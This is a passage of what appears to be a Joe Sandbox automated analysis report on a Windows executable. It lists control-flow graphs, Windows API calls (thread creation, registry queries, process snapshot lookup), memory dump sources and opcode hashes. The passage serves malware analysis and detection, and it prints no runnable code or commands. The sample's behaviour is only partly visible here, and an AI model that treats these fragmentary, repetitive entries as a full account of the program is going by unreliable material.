                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2227675388-0
                                                                                                        • Opcode ID: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                                                                        • Instruction ID: 598cdeddc025ade9b9916cc483952d390fd687b2127ecc3d21840085fc418226
                                                                                                        • Opcode Fuzzy Hash: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                                                                        • Instruction Fuzzy Hash: 6F51A0B0B40315EFDB10CF68E9806AEBBF1FB58305F6081AAD40597351D339AA81CF49

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1289 42342c-42343c 1290 423447-42344d 1289->1290 1291 42343e call 422bd0 1289->1291 1293 423459-42346e 1290->1293 1294 42344f-423454 1290->1294 1295 423443-423445 1291->1295 1297 423470-423475 RtlEnterCriticalSection 1293->1297 1298 42347a-423483 1293->1298 1296 4235cf-4235d6 1294->1296 1295->1290 1295->1294 1297->1298 1299 423485 1298->1299 1300 42348a-423490 1298->1300 1299->1300 1301 423542-423548 1300->1301 1302 423496-42349a 1300->1302 1305 42354a-423557 1301->1305 1306 42359d-42359f call 4232e4 1301->1306 1303 42349f-4234b3 1302->1303 1304 42349c 1302->1304 1303->1301 1308 4234b9-4234d6 1303->1308 1304->1303 1309 423566-42359b call 424e24 1305->1309 1310 423559-423561 1305->1310 1311 4235a4-4235bb 1306->1311 1312 4234e6-42350a 1308->1312 1313 4234d8-4234e4 1308->1313 1309->1296 1310->1309 1318 4235c7 1311->1318 1319 4235bd-4235c2 RtlLeaveCriticalSection 1311->1319 1317 42350c-42353d call 424e24 1312->1317 1313->1317 1317->1296 1319->1318
                                                                                                        APIs
                                                                                                          • Part of subcall function 00422BD0: RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                                                                          • Part of subcall function 00422BD0: RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                                                                          • Part of subcall function 00422BD0: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,00000000,?,004235F6,00000000), ref: 00422C24
                                                                                                          • Part of subcall function 00422BD0: RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00423475
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 004235C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2227675388-0
                                                                                                        • Opcode ID: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                                                                        • Instruction ID: 598cdeddc025ade9b9916cc483952d390fd687b2127ecc3d21840085fc418226
                                                                                                        • Opcode Fuzzy Hash: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                                                                        • Instruction Fuzzy Hash: 6F51A0B0B40315EFDB10CF68E9806AEBBF1FB58305F6081AAD40597351D339AA81CF49

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 486 425c04-425c06 487 425bc8-425bcc 486->487 488 425c0c-425c11 486->488 490 425bce-425bdb SysFreeString 487->490 491 425bdc 487->491 488->487 489 425c17-425c21 SysReAllocStringLen 488->489 492 425c27 489->492 493 425b98-4261dc 489->493 490->491 495 4261f6 493->495 496 4261de-4261ee SysAllocStringLen 493->496 496->493 497 4261f4 496->497 497->495
                                                                                                        APIs
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                                                                        • SysReAllocStringLen.OLEAUT32(?,?,?), ref: 00425C1A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree
                                                                                                        • String ID:
                                                                                                        • API String ID: 344208780-0
                                                                                                        • Opcode ID: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                                                                        • Instruction ID: 1ef83d56cbdf2652bb4066a39517635c9c34684a331697f53fb0bb73bc7ca3e4
                                                                                                        • Opcode Fuzzy Hash: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                                                                        • Instruction Fuzzy Hash: FAD012B43006216DEE149A25A901A372A7A9FD1722BE9864EB8019A245DA7CAC01962C

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1322 415660-41573c 1333 415742-415745 1322->1333 1334 415d28-415d2f 1322->1334 1333->1334 1335 41574b-415777 call 40ee70 1333->1335 1342 4158e3-4158fc 1335->1342 1343 41577d-415810 call 40ee70 1335->1343 1348 4158fd-415909 call 40eab0 1342->1348 1371 4158c7-4158e1 1343->1371 1372 415816-415885 call 40ee70 call 40eab0 1343->1372 1355 415912-415976 1348->1355 1377 41597d-415982 1355->1377 1371->1348 1372->1334 1436 41588b-4158a3 1372->1436 1378 415a25-415a65 1377->1378 1379 415988-415992 1377->1379 1396 415a67-415a6e 1378->1396 1379->1334 1382 415998-41599e 1379->1382 1384 4159a0-4159cc 1382->1384 1385 4159d7-4159d9 1382->1385 1384->1334 1415 4159d2-4159d5 1384->1415 1385->1334 1387 4159df-4159e2 1385->1387 1387->1334 1388 4159e8-415a20 1387->1388 1388->1377 1398 415b11-415b18 1396->1398 1399 415a74-415a97 1396->1399 1402 415b25-415b2b 1398->1402 1403 415b1a-415b1f call 404c14 1398->1403 1411 415a99-415a9d 1399->1411 1412 415abd 1399->1412 1402->1334 1408 415b31-415b59 1402->1408 1403->1402 1408->1334 1414 415b5f 1408->1414 1411->1412 1419 415a9f-415aad 1411->1419 1420 415ac3-415ad9 1412->1420 1416 415b66-415b69 1414->1416 1415->1377 1421 415b92-415b98 1416->1421 1422 415b6b-415b87 1416->1422 1419->1420 1423 415aaf-415abb 1419->1423 1424 415d23 1420->1424 1425 415adf-415b04 1420->1425 1421->1334 1427 415b9e-415bcf 1421->1427 1422->1334 1439 415b8d-415b90 1422->1439 1423->1420 1424->1334 1425->1334 1440 415b0a-415b0c 1425->1440 1427->1424 1437 415bd5-415bed 1427->1437 1447 4158a5-4158a7 1436->1447 1448 4158a9-4158ae 1436->1448 1445 415bfa-415c2e 1437->1445 1446 415bef-415bf4 call 404c14 1437->1446 1439->1416 1440->1396 1445->1334 1457 415c34-415c37 1445->1457 1446->1445 1447->1448 1450 4158b1-4158b3 1447->1450 1448->1450 1450->1334 1451 4158b9-4158bc 1450->1451 1451->1334 1454 4158c2-4158c5 1451->1454 1454->1355 1457->1334 1458 415c3d-415d0b 1457->1458
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0000
                                                                                                        • API String ID: 0-211534962
                                                                                                        • Opcode ID: 0adc0da8b6ac4ccf3f743cce2cbfe1a6654ea4958e7f599bc5796df7d377838d
                                                                                                        • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                                                                        • Opcode Fuzzy Hash: 0adc0da8b6ac4ccf3f743cce2cbfe1a6654ea4958e7f599bc5796df7d377838d
                                                                                                        • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1475 411590-41167e call 4025e0 1489 411684-411687 1475->1489 1490 411cff-411d05 1475->1490 1489->1490 1491 41168d-41169b 1489->1491 1492 4116a1-411770 call 40ee70 * 2 1491->1492 1493 41179f-4117b6 1491->1493 1520 411781-411798 1492->1520 1521 411772-4117c8 1492->1521 1499 411c91-411ce7 1493->1499 1520->1499 1521->1490 1525 4117ce-411816 1521->1525 1525->1490 1531 41181c-41181f 1525->1531 1531->1490 1532 411825-4118d3 call 40fba0 1531->1532 1543 4118d9-4118e6 1532->1543 1544 4119d6-411acb call 40fba0 1543->1544 1545 4118ec-4118f9 1543->1545 1578 411ad1-411ade 1544->1578 1545->1490 1546 4118ff-411905 1545->1546 1547 411907-411951 1546->1547 1548 41195c-411969 1546->1548 1547->1490 1564 411957-41195a 1547->1564 1548->1490 1550 41196f-411972 1548->1550 1550->1490 1553 411978-4119cb 1550->1553 1567 4119d1 1553->1567 1564->1567 1567->1543 1579 411ae4-411af1 1578->1579 1580 411bdb-411c8b 1578->1580 1579->1490 1581 411af7-411afd 1579->1581 1580->1499 1583 411b54-411b61 1581->1583 1584 411aff-411b49 1581->1584 1583->1490 1585 411b67-411b6a 1583->1585 1584->1490 1598 411b4f-411b52 1584->1598 1585->1490 1586 411b70-411bc3 1585->1586 1601 411bc9-411bd6 1586->1601 1598->1601 1601->1578
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: E
                                                                                                        • API String ID: 0-3568589458
                                                                                                        • Opcode ID: 9141550b6d6829455b6e08a61abb0c99e7e0684e9f5b713fbc30798890655fad
                                                                                                        • Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
                                                                                                        • Opcode Fuzzy Hash: 9141550b6d6829455b6e08a61abb0c99e7e0684e9f5b713fbc30798890655fad
                                                                                                        • Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1610 408d7c-408d87 1611 40abac-40ac9b call 4025e0 call 418c90 * 2 1610->1611 1612 408d8d-408d9c 1610->1612 1614 408da2-409172 call 410180 * 4 1612->1614 1615 4091be-4091da 1612->1615 1988 409177-4091b9 1614->1988 1621 4091e0-409209 call 4125a0 1615->1621 1622 40948c-4094a8 1615->1622 1631 40924b-409296 1621->1631 1632 40920b-409244 call 40fba0 call 415660 1621->1632 1629 409b34-409c97 call 40ee70 * 2 call 411590 1622->1629 1630 4094ae-4094c7 call 4125a0 1622->1630 1754 409c99-409ca6 1629->1754 1755 409cab-409cc4 call 4125a0 1629->1755 1644 409509-409582 1630->1644 1645 4094c9-409502 call 40fba0 call 415660 1630->1645 1661 409298-4092a4 call 404c14 1631->1661 1662 4092aa-40933d call 40ee70 1631->1662 1632->1631 1687 409584-4095a5 1644->1687 1688 4095a7 1644->1688 1645->1644 1661->1662 1706 409362 1662->1706 1707 40933f-409360 1662->1707 1690 4095b1-409646 call 410fb0 call 40ee70 1687->1690 1688->1690 1737 4097e2-409858 call 410fb0 call 40ee70 1690->1737 1738 40964c-4097dd call 40ee70 * 2 1690->1738 1711 40936c-4093ff call 410780 1706->1711 1707->1711 1769 409405-40947e 1711->1769 1770 409487 1711->1770 1797 409aad-409af7 1737->1797 1798 40985e-40986c 1737->1798 1738->1797 1765 409dec-409e82 call 40ee70 * 2 1754->1765 1764 409cca-409ce4 1755->1764 1755->1765 1778 40aba7 1764->1778 1779 409cea-409db1 call 410180 call 40fba0 call 415660 1764->1779 1853 409e89-409ea9 1765->1853 1769->1770 1771 409ee9-40a26c call 418c90 * 2 call 418a10 * 2 call 40ee70 * 7 1770->1771 1998 40a272-40a2b9 call 40f8f0 1771->1998 1999 40aa5b-40aa71 call 40f1d0 1771->1999 1778->1778 1891 409db3 1779->1891 1892 409db5-409dd0 1779->1892 1835 409af9-409b1a 1797->1835 1836 409b1c 1797->1836 1802 40988a 1798->1802 1803 40986e-409888 1798->1803 1809 409894-4098c7 1802->1809 1803->1809 1820 4098c9-4098ea 1809->1820 1821 4098ec 1809->1821 1826 4098f6-409924 1820->1826 1821->1826 1842 409926-409947 1826->1842 1843 409949 1826->1843 1837 409b26-409b2f 1835->1837 1836->1837 1837->1771 1849 409953-409aaa 1842->1849 1843->1849 1849->1797 1853->1778 1895 409dd6-409de5 1891->1895 1892->1779 1892->1895 1895->1765 2012 40a329-40a370 call 40f8f0 1998->2012 2013 40a2bb-40a320 1998->2013 2003 40aa73-40aa7a call 40f1a0 1999->2003 2004 40aa7f-40aac9 1999->2004 2003->2004 2015 40aacb-40aaec 2004->2015 2016 40aaee 2004->2016 2031 40a3e0-40a427 call 40f8f0 2012->2031 2032 40a372-40a3d7 2012->2032 2013->2012 2019 40aaf8-40ab84 2015->2019 2016->2019 2045 40a497-40a4de call 40f8f0 2031->2045 2046 40a429-40a48e 2031->2046 2032->2031 2058 40a4e0-40a545 2045->2058 2059 40a54e-40a595 call 40f8f0 2045->2059 2046->2045 2058->2059 2071 40a605-40a64c call 40f8f0 2059->2071 2072 40a597-40a5fc 2059->2072 2084 40a6bc-40a703 call 40f8f0 2071->2084 2085 40a64e-40a6b3 2071->2085 2072->2071 2097 40a773-40a7ba call 40f8f0 2084->2097 2098 40a705-40a76a 2084->2098 2085->2084 2110 40a82a-40a871 call 40f8f0 2097->2110 2111 40a7bc-40a821 2097->2111 2098->2097 2123 40a8e1-40a928 call 40f8f0 2110->2123 2124 40a873-40a8d8 2110->2124 2111->2110 2136 40a998-40a9df call 40f8f0 2123->2136 2137 40a92a-40a98f 2123->2137 2124->2123 2149 40a9e1-40aa46 2136->2149 2150 40aa4f-40aa56 2136->2150 2137->2136 2149->2150
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D
                                                                                                        • API String ID: 0-2746444292
                                                                                                        • Opcode ID: f9e37a6dceaf84c98bfe42f1550ad70babc89238222ada09e67fe6c6bff90c65
                                                                                                        • Instruction ID: 28a137cb3eb25e758eafbfe2ee42426fba9f6ce594aea99c4a1f109bb6dd76d7
                                                                                                        • Opcode Fuzzy Hash: f9e37a6dceaf84c98bfe42f1550ad70babc89238222ada09e67fe6c6bff90c65
                                                                                                        • Instruction Fuzzy Hash: 7CE1B876900104EFD705EBE0EE989DF7BB9EB4C301B10812AF617A7264DF745A45CBA8
                                                                                                        APIs
                                                                                                        • LoadStringA.USER32(00000000,0000FFF4,?,00001000), ref: 00427892
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LoadString
                                                                                                        • String ID:
                                                                                                        • API String ID: 2948472770-0
                                                                                                        • Opcode ID: 73449cd31783198abe0234b761cb9d43333b180b61f606bf4a20dae5c641b838
                                                                                                        • Instruction ID: 22544c539b725ec5b4ac43c57f7f09c783e7cdc452e560019d01f461da980ed3
                                                                                                        • Opcode Fuzzy Hash: 73449cd31783198abe0234b761cb9d43333b180b61f606bf4a20dae5c641b838
                                                                                                        • Instruction Fuzzy Hash: B0F0A0727005209FCB10EA5DE8C2B8633DC4F4C348B548066B548CB359DB78CC44C7AA
                                                                                                        APIs
                                                                                                        • LoadStringA.USER32(00000000,0000FF84,?,00001000), ref: 00427892
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LoadString
                                                                                                        • String ID:
                                                                                                        • API String ID: 2948472770-0
                                                                                                        • Opcode ID: 8796358e6523dfde688f4884a08ea08aa8a30318939fa9443135e4f43c793457
                                                                                                        • Instruction ID: 22544c539b725ec5b4ac43c57f7f09c783e7cdc452e560019d01f461da980ed3
                                                                                                        • Opcode Fuzzy Hash: 8796358e6523dfde688f4884a08ea08aa8a30318939fa9443135e4f43c793457
                                                                                                        • Instruction Fuzzy Hash: B0F0A0727005209FCB10EA5DE8C2B8633DC4F4C348B548066B548CB359DB78CC44C7AA
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(?,?,Function_00025428,00000000,?,?), ref: 00425496
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                                                                        • Instruction ID: cc400aaec5f98775912378b72cba36d114b7af17ff567da94c7c96793c6a670b
                                                                                                        • Opcode Fuzzy Hash: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                                                                        • Instruction Fuzzy Hash: 5BE0C9B2301224BFD300DA5EAC44E9BBBECDFD9365B50C16AB90CC7221D5759C0186B4
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(?,?,Function_00004428,00000000,?,?), ref: 00425496
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                                                                        • Instruction ID: cc400aaec5f98775912378b72cba36d114b7af17ff567da94c7c96793c6a670b
                                                                                                        • Opcode Fuzzy Hash: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                                                                        • Instruction Fuzzy Hash: 5BE0C9B2301224BFD300DA5EAC44E9BBBECDFD9365B50C16AB90CC7221D5759C0186B4
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00426CE2
                                                                                                          • Part of subcall function 00426F58: GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                                                                          • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                                                                          • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                                                                          • Part of subcall function 00426F58: RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 2796650324-0
                                                                                                        • Opcode ID: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                                                                        • Instruction ID: 33c73a500caeb01f155e44840a867e4305e698149c574fd086c8c5f59709d573
                                                                                                        • Opcode Fuzzy Hash: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                                                                        • Instruction Fuzzy Hash: D0E06D71A002249BCB10EE5C99C1A4733D8AF08754F4105A6BCA8CF34AD3B5DD1087E4
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00426CE2
                                                                                                          • Part of subcall function 00426F58: GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                                                                          • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                                                                          • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                                                                          • Part of subcall function 00426F58: RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 2796650324-0
                                                                                                        • Opcode ID: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                                                                        • Instruction ID: 33c73a500caeb01f155e44840a867e4305e698149c574fd086c8c5f59709d573
                                                                                                        • Opcode Fuzzy Hash: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                                                                        • Instruction Fuzzy Hash: D0E06D71A002249BCB10EE5C99C1A4733D8AF08754F4105A6BCA8CF34AD3B5DD1087E4
                                                                                                        APIs
                                                                                                          • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
